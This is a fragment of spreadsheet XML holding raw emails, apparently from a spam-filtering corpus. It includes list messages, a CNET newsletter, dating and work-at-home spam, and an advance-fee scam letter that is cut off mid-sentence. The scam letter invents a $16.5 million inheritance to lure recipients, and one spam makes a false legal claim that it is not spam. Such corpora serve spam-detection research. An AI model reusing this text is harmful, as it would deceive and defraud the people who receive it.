 "Tall Spirits, Blocking the Night" -- TALEBONES #25, Dec 2002
 "Jack's House" -- STRANGE HORIZONS, Dec 2002
 "Of Stone Castles and Vainglorious Time" -- REDSINE, Jan 2003
 "One Is All Alone" -- STRANGE HORIZONS, Jan 2003
 "You Want Candy" -- AS OF YET UNTITLED, Feb 2003
 "Walking Backward Through the Countries of Life" -- HOUR OF PAIN, Feb 2003
 ---
 Jay Lake | www.jlake.com | jlake@jlake.com | 503.806.3626
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I have your money
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi !  Your name was submitted as someone who might be interested in making money at home.  If this is in error, please excuse this email and delete it. This is a one time mailing. "DO NOT REPLY UNLESS YOU WANT MORE EMAILS"!!!
 If you ARE interested in Making Money At Home, send an email to
 giftman@post.com and put "Request Info" in the Subj. line.
 Thanks and have a nice day.    
 -------------------------------------------------------------------------------------------
 Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter is not considered "spam" as long as we include:
 1)contact information and,
 2)the way to be removed from future mailings (see below).
 To Remove Yourself From This List: 
 Please reply with the email address that you would like removed and the word REMOVE in the subject heading.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</si>
  <si>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 /&gt;&lt;br /&gt;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href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWfh8AsWP9VA35c54JMcR"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href="http://clickthru.online.com/Click?q=60-oqItIsE3hXMC0YGLN8S_eSgFWVRR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zcAGroK_rjups7LLZ5ZR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4H3AnjoO3Nt-tKChBwnR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7c3GgwG4UByjw2PB1s7iR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq53PUU_91PHq15ZNEEZPR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=ca-iciuQUgTC8pcVTWcl8jfOfRHHUnR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETxjC2W9BfbQq-Kh1XhaeR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDSAhv1K1uUJ5QddfWmTyR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj8jsJ9uis-LYSS7ZMgtY8lR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPxRjN7tRqEsB8LE27qd4R"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22,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href="http://clickthru.online.com/Click?q=33-vUjnINjcJEkusUkz6yClxb-7XsrR" &gt;DJIA&lt;/a&gt;&lt;br&gt;7784.58 &amp;nbsp;&lt;font color=#cc0000&gt;-234.68&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVd_qV3UXl_kj2ZBSJuRR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;NA &amp;nbsp;&lt;font color=#cc0000&gt;-36.50&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8dxFOwEobvZm5yGKIaZR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;819.85 &amp;nbsp;&lt;font color=#cc0000&gt;-27.90&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9PqiT9ijT8UEE0WNrUZcR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;897.37 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-48.86&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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fall again with telecoms, Dow drops below 8K&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The day after WorldCom Group filed for bankruptcy protection, telecom shares suffered and helped drag down the tech sector.
 &lt;p&gt;
 BellSouth stock tumbled 18.07 percent after it missed Wall Street's earnings target and offered a worse-than-expected outlook.  With shares of SBC Communications, Qwest Communications International, Sprint and AT&amp;T also dropping, CNET's Tech index shed 48.86 points, or 5.3 percent, to 897.37. The tech-heavy Nasdaq composite index fell 36.5 points, or 2.77 percent, to 1,282.55.
 &lt;p&gt;
 With a report raising questions about Citigroup and J.P. Morgan Chase &amp; Co.'s role in the Enron fiasco, broader markets lost ground as well. After a see-saw session, the Dow Jones industrials ended down 234.7 points, or 2.93 percent, to 7,784.5. The S&amp;P 500 slid 27.90 points, or 3.29 percent, to 819.85.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href="http://clickthru.online.com/Click?q=88-ec5PQQKHiqOVSUx-rU358atSBbiR" &gt;BellSouth posts lower second-quarter profits &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 BellSouth Corp., the No. 3 U.S. local telephone company, on Monday posted lower second-quarter profits due to slack demand and turbulent economic conditions in North America and Latin America.
 BellSouth, the dominant local telephone company in nine Southeastern states from Kentucky to Florida, said net income fell to 16 cents a share from 47 cents a year earlier. &lt;br&gt;&lt;B&gt;BELLSOUTH CORP 22.61 -18.11% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0hoCcBmdnuKLvd75wKZzPR" &gt;WorldCom, BellSouth news adds to telecom gloom &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 WorldCom Inc.'s bankruptcy filing is only the latest in a long line of sad news for a slumping telecom industry grappling with soft demand, falling earnings and worries about accounting.
 And things are not likely to change any time soon, as signaled by BellSouth Corp.'s disappointing second-quarter earnings and downward revision to its full-year outlook, analysts and investors said on Monday.&lt;br&gt;&lt;B&gt;WORLDCOM INC-WORLDCOM TRCK STK 0.14 55.56% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX04Ac0VI5YjM2cmpxUCPunR" &gt;HP seeks Texas justice; Gateway dinged &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 In separate court cases, a Florida jury dinged Gateway for sending phone calls to the wrong business, and a federal court in Houston issued an injunction barring Emachines from selling products that infringe on Hewlett-Packard patents.
 A jury in Florida ruled last week that Gateway must pay $3.6 million for a typo in which it sent customers with a PC problem to an 800 number owned by Pensacola, Fla.-based Mo' Money Associates instead of the company's own complaint line, which had a similar number but with an 888 prefix.&lt;br&gt;&lt;B&gt;HEWLETT-PACKARD CO 12.00 -6.25%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href="http://clickthru.online.com/Click?q=c7-KG43QLPPHlPupi8NWtUoF24wxeeR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0LQv504rTvBz6gEwTinhlyR" &gt;Banc of America Securities stays with "buy" rating on Novellus Systems in note 7/22/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Mark FitzGerald expects the chip equipment maker to meet his revenue and earnings estimates of $225 million and 10 cents per share when it reports second-quarter results after the market close. He anticipates earnings guidance for the current quarter of 15-20 cents per share. The stock could move a bit higher, but FitzGerald believes better data from end markets is needed for a sustained rally. He also expects the firm to announce it will pay back $880 million in debt.&lt;br&gt;&lt;B&gt;NOVELLUS SYSTEMS 29.55 -0.81% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsTLZozfIQH3XX8owMnerlR"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href="http://clickthru.online.com/Click?q=06-fP6uI481hDh4T6omap_vCgSyiL4R" &gt;Tyco CFO's tenure seen ending as confidence wanes &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Tyco International Ltd.'s earnings release on Tuesday may very well be the last for Chief Financial Officer Mark Swartz, whose tenure has been marred by his close association with the conglomerate's disgraced former chairman.
 Named CFO in 1995, Swartz has been the chief defender of Tyco's accounting, which has drawn fire for being opaque and misleading. But perhaps more important, Swartz was a key adviser and architect in Dennis Kozlowski's decade-long acquisition binge to build Tyco into one of the world's largest manufacturing conglomerates.&lt;br&gt;&lt;B&gt;TYCO INTERNATIONAL 11.85 -5.12% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA1G4Ol3n9kgGa2oXqGyR"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href="http://clickthru.online.com/Click?q=31-V_YRIjMwk68Iq0ZyLxjkqVAXXblR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpkGBN6jR6a1cN0535V0Y9R"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href="http://clickthru.online.com/Click?q=5b-5LOwIBKkZU9Ab8qxCjjvDSwizzcR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdpiyGZegozKns2asfI8UkRR"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href="http://clickthru.online.com/Click?q=85-2G2oQ7KrekDiVnTaf70SVbToBBPR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1-0Wzme0dAVJ9PZAKTrR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNkl8fQtdxQMKtNX8PQiR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzO4Tpi03SMzSROUJEymxqPR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUP7liO4tRBbjsMVKpv3DxnR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkx5uhA2NOqBxDVAmoBameR"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href="http://clickthru.online.com/Click?q=04-k9W0IFQcTWMEZRY98BbBL7kOi_yR"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href="http://clickthru.online.com/Click?q=19-BLe0I2rcgPAJd1cKMZ2Fz8IR7XlR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5wGYP-_ktQ3DlPfP8N4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=44-9nvfzcUNbCoeh7AIz8j1c3ByJ6BtlsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEn9uCZVsBSlpW-B_KMqztFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyEG1KnneDRQA5K-fxuEL59R"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href="http://clickthru.online.com/Click?q=83-U-BXQYJq_uvij7UtuoAABMMPZ9rR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_z4Y1hd7RcCW5CH7esbKRiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaO9J-BZQhaIHsSzky0PR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqh_Em4sgVnxXFZcIuInR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyhknyviRmBekeVktk2eR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13g_tHep1kOqFb2GVaGyR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-22" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=02-qit9nPj-NkIk18p4cDZgQWppY9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG-Social] Anyone in  Limerick want to help?
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorted.  I've got someone...
 Thanks,
 Conor
 On Tue, Aug 06, 2002 at 03:29:38PM +0100 or so it is rumoured hereabouts, 
 Conor Daly thought:
 &gt; I've had an offer of a couple of secondhand 18" LCD monitors in Limerick.
 &gt; Would anyone like to assist by going to test, purchase and store same for
 &gt; a couple of weeks (I'm in dublin and going away for a bit so I won't be
 &gt; able to organise collection for a while)?  Please reply off-list of you
 &gt; can help.
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   1:32pm  up 75 days, 22:50,  0 users,  load average: 0.00, 0.00, 0.00
 Hobbiton.cod.ie
   1:30pm  up 18 days, 19:54,  1 user,  load average: 0.24, 0.12, 0.03
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dialogue et Rencontre ? Rejoins nous !
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset="iso-8859-1"
 Venez rencontrer l'ame soeur sur LOVEIMPACT.com
     &gt; Inscription gratuite
     &gt; Consultez les fiches
     &gt; Dialoguez en direct
 Inscrivez-vous gratuitement en cliquant ici :
 http://www.imp20.com/loveimpact/loveimpact300702-2.htm
 Vous recevez cet e-mail en tant qu'abonn  Oktomail
 Pour ne plus tre contact, cliquez ici :
 http://www.imp20.com/loveimpact/loveimpact300702-remove.htm
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D"59%" border=3D"0" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-=
 serif" size=3D"3"&gt;&lt;b&gt;&lt;font color=3D"5A1558"&gt;Rencontrez=20
         l'amour pour la vie ou juste pour une nuit=2E=2E=2E&lt;br&gt;
         100% Anonyme !&lt;br&gt;
         100 % Discret=2E=2E=2E&lt;br&gt;
         Toujours coquin mais Jamais Vulgaire ! &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" style=3D"bor=
 der-collapse: collapse" bordercolor=3D"#111111" width=3D"320" align=3D"cen=
 ter"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%"&gt;&lt;a href=3D"http://www=2Eimp20=2Ecom/loveimpac=
 t/loveimpact300702-1=2Ehtm" target=3D"_blank"&gt;&lt;img border=3D"0" src=3D"htt=
 p://x=2Ejmailer=2Ecom/fr/standalone/loveimpact/260702/haut_3=2Ejpg" width=3D=
 "400" height=3D"100"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%" background=3D"http://x=2Ejmailer=2Ecom/fr/sta=
 ndalone/loveimpact/260702/inscription_fond=2Ejpg"&gt;=20
             &lt;div align=3D"center"&gt;=20
               &lt;center&gt;
                 &lt;table border=3D"0" cellpadding=3D"4" cellspacing=3D"0" st=
 yle=3D"border-collapse: collapse" bordercolor=3D"#111111" width=3D"90%"&gt;
                   &lt;tr&gt;=20
                     &lt;td width=3D"100%"&gt;
                       &lt;div align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=
 =3D"2"&gt;&lt;br&gt;
                         &lt;/font&gt;&lt;/b&gt;=20
                         &lt;table width=3D"100%" border=3D"0"&gt;
                           &lt;tr&gt;=20
                             &lt;td width=3D"12%"&gt;&amp;nbsp;&lt;/td&gt;
                             &lt;td width=3D"88%"&gt;&lt;b&gt;&lt;font face=3D"Verdana" si=
 ze=3D"2"&gt;-=20
                               Inscription ANONYME et GRATUITE &lt;br&gt;
                               - Dialogue en Direct &lt;br&gt;
                               - Fiches d'inscrit(e)s + photos&lt;br&gt;
                               - =2E=2E=2E &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                         &lt;b&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;&lt;br&gt;
                         Une s&amp;eacute;lection des dernir(e)s inscrit(e)s du=
  jour&lt;br&gt;
                         &lt;br&gt;
                         &lt;/font&gt;&lt;/b&gt; &lt;/div&gt;
                       &lt;div align=3D"left"&gt;=20
                         &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D=
 "0" style=3D"border-collapse: collapse" bordercolor=3D"#111111" width=3D"1=
 00%" align=3D"left"&gt;
                           &lt;tr&gt;=20
                             &lt;td width=3D"23%" height=3D"109" valign=3D"top=
 " align=3D"left"&gt;=20
                               &lt;img border=3D"0" src=3D"http://x=2Ejmailer=2E=
 com/fr/standalone/loveimpact/260702/photo01=2Ejpg" width=3D"70" height=3D"=
 93"&gt;&lt;/td&gt;
                             &lt;td width=3D"77%" align=3D"left" valign=3D"top=
 " height=3D"109"&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-=
 serif"&gt;&lt;b&gt;=20
                               CANDILIENE&lt;/b&gt;&lt;br&gt;
                               Blonde, 19ans&lt;br&gt;
                               Ne veut pas passer seule ses vacances=2E=2E=2E=
  &lt;br&gt;
                               Ch H Metisse ou black de pr=E9f=E9rence=2E=2E=
 =2E&lt;br&gt;
                               &lt;br&gt;
                               &lt;font color=3D"#FF0000" size=3D"1"&gt;&lt;a href=3D=
 "http://www=2Eimp20=2Ecom/loveimpact/loveimpact300702-2=2Ehtm" target=3D"_=
 blank"&gt;Contactez-la&lt;/a&gt;=20
                               maintenant sur loveimpact=2Ecom&lt;br&gt;
                               &amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;/tr&gt;
                           &lt;tr&gt;=20
                             &lt;td width=3D"23%" align=3D"left" valign=3D"top=
 "&gt; &lt;img border=3D"0" src=3D"http://x=2Ejmailer=2Ecom/fr/standalone/loveimp=
 act/260702/photo04=2Ejpg" width=3D"70" height=3D"105"&gt;&lt;br&gt;
                               &amp;nbsp;&lt;/td&gt;
                             &lt;td width=3D"77%" align=3D"left" valign=3D"top=
 "&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;=20
                               &lt;br&gt;
                               &lt;br&gt;
                               Mehdi&lt;/b&gt;&lt;br&gt;
                               Juste pour one night one girl delirante et t=
 op fun=2E=2E=2E&lt;br&gt;
                               &lt;br&gt;
                               &lt;font color=3D"#FF0000" size=3D"1"&gt;&lt;a href=3D=
 "http://www=2Eimp20=2Ecom/loveimpact/loveimpact300702-2=2Ehtm" target=3D"_=
 blank"&gt;Contactez-le&lt;/a&gt;=20
                               maintenant sur loveimpact=2Ecom&lt;/font&gt;&lt;/font=
 &gt;&lt;/td&gt;
                           &lt;/tr&gt;
                           &lt;tr&gt;=20
                             &lt;td width=3D"23%" align=3D"left" valign=3D"top=
 "&gt; &lt;img border=3D"0" src=3D"http://x=2Ejmailer=2Ecom/fr/standalone/loveimp=
 act/260702/photo02=2Ejpg" width=3D"70" height=3D"94"&gt;&lt;br&gt;
                               &amp;nbsp;&lt;/td&gt;
                             &lt;td width=3D"77%" align=3D"left" valign=3D"top=
 "&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;=20
                               &lt;br&gt;
                               SONIA&lt;/b&gt;&lt;br&gt;
                               Blonde, 21ans&lt;br&gt;
                               Cherche =E0 =EAtre s=E9duite par un homme mu=
 scl=E9 de la=20
                               t=EAte only !&lt;br&gt;
                               &lt;font size=3D"1"&gt;&lt;br&gt;
                               &lt;font color=3D"#FF0000"&gt;&lt;a href=3D"http://ww=
 w=2Eimp20=2Ecom/loveimpact/loveimpact300702-2=2Ehtm" target=3D"_blank"&gt;Con=
 tactez-la&lt;/a&gt;=20
                               maintenant sur loveimpact=2Ecom&lt;/font&gt;&lt;/font=
 &gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;/tr&gt;
                           &lt;tr&gt;=20
                             &lt;td width=3D"23%" align=3D"left" valign=3D"top=
 "&gt; &lt;img border=3D"0" src=3D"http://x=2Ejmailer=2Ecom/fr/standalone/loveimp=
 act/260702/photo03=2Ejpg" width=3D"70" height=3D"100"&gt;&lt;br&gt;
                               &amp;nbsp;&lt;/td&gt;
                             &lt;td width=3D"77%" align=3D"left" valign=3D"top=
 "&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;=20
                               &lt;br&gt;
                               Yangchi&lt;/b&gt;&lt;br&gt;
                               M=E9tisse asiatique, 19ans&lt;br&gt;
                               faite la r=EAver en lui racontant des histoi=
 res=2E=2E=2E&lt;br&gt;
                               &lt;br&gt;
                               &lt;font color=3D"#FF0000" size=3D"1"&gt;&lt;a href=3D=
 "http://www=2Eimp20=2Ecom/loveimpact/loveimpact300702-2=2Ehtm" target=3D"_=
 blank"&gt;Contactez-la&lt;/a&gt;=20
                               maintenant sur loveimpact=2Ecom&lt;/font&gt;&lt;/font=
 &gt;&lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/div&gt;
                       &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                       &lt;p&gt;&amp;nbsp;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;b&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;&lt;a href=3D"http://www=
 =2Eimp20=2Ecom/loveimpact/loveimpact300702-2=2Ehtm" target=3D"_blank"&gt;&lt;img=
  src=3D"http://x=2Ejmailer=2Ecom/fr/standalone/loveimpact/260702/inscripti=
 on_gratuite=2Ejpg" width=3D"192" height=3D"39" border=3D"0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b=
 &gt;=20
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"100%"&gt; &lt;img src=3D"http://x=2Ejmailer=2Ecom/fr/stan=
 dalone/loveimpact/260702/inscription_bas_2=2Egif" width=3D"400" height=3D"=
 13"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;div align=3D"center"&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=3D"center"&gt;&lt;img src=3D"http://www=2Eimp20=2Ecom/loveimpact/loveim=
 pact300702=2Egif"&gt;=20
   &lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Vous rec=
 evez cet=20
   e-mail en tant qu'abonn&amp;eacute; &amp;agrave; Oktomail&lt;br&gt;
   Pour ne plus recevoir de message, &lt;a href=3D"http://www=2Eimp20=2Ecom/lo=
 veimpact/loveimpact300702-remove=2Ehtm"&gt;cliquez-ici&lt;/a&gt;=2E&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_84815C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I NEED AN URGENT CAPABLE ASSISTANCE.TEL:+225 05775748
</t>
  </si>
  <si>
    <t xml:space="preserve">MR MARTIN FRANCIS
 ABIDJAN COTE DIVOIRE
 WEST AFRICA
 TEL:+225 05775748.
                   URGENT AND NOBLE PROPOSAL
 ATTN: DIRECTOR.
 DEAR ,
 I wish to extend my greeting to you and your entire
 family. I got your contact from the ivoirian chamber
 of commerce, I prayed over it and selected your name
 among other names because of its esteeming
 nature.Morever,after my strong prayers and fasting,
 God reveals to me that you are straight forward,
 Honest and Gods person.
 This is the reason I never waste time to propose you
 this business for our mutual benefits. Infact, You
 will never regret it provided you give me your
 possible best cooperate hand, Believe me.
 I am MARTIN FRANCIS, A cote divoire national and the
 only child of late Mr and Mrs FRANCIS. My late father
 was the former financial controller of Cte dIvoire
 telecommunication (CITELCOM). My father died due to
 the heat of political crisis in my country recently
 last years.But,I am motherless since,before my fathers
 late and the death of my mother on 26 SEPTEMBER 1993
 was as a result of spiritual attack by our family
 member who hated her just because of my fathers
 wealth.
 Moreover, they tried their own part as well against my
 father and myself but negative because God almighty
 is available at our side. Infact God is wonderful.
 Although, before the death of my father in one of the
 private hospital here, he secretly revealed to me
 specifically on family matters and mostly the safety
 of his monies us$16,500,000.00 (sixteen million,five 
 hundred thousand united states dollars) which he
 deposited in a bank here in my county Abidjan, 
 Cte dIvoire and used my name,MARTIN FRANCIS as the
 next of kin for the deposits. This amount was accrued
 from an over-invoiced contract award for the
 construction of an underground telephone network to
 replace the former in the new city (Yamoussoukro) and
 other major cities also for installation of the
 microwave station awarded to my late father,Mr JOSEPH
 FRANCIS in 1999 to expatiate companies. In fact, after
 the finished payment of  contract workers, my late
 father deposited this fund in a bank as the full
 beneficiary contractor of the said company (CITELCOM)
 this is the fund I want to transferred to your account
 as the beneficiary contractor due for payment,provided
 you cooperate.Therefore I am seeking your full and
 urgent  assistance for the telegraphic transfer of
 this sixteen million and five hundred thousand united
 states dollars, us$16,500.000 US dollars to your
 designated account for a very good business investment
 in your country as due to the instruction my father
 gave to me before he late. What I require from you are
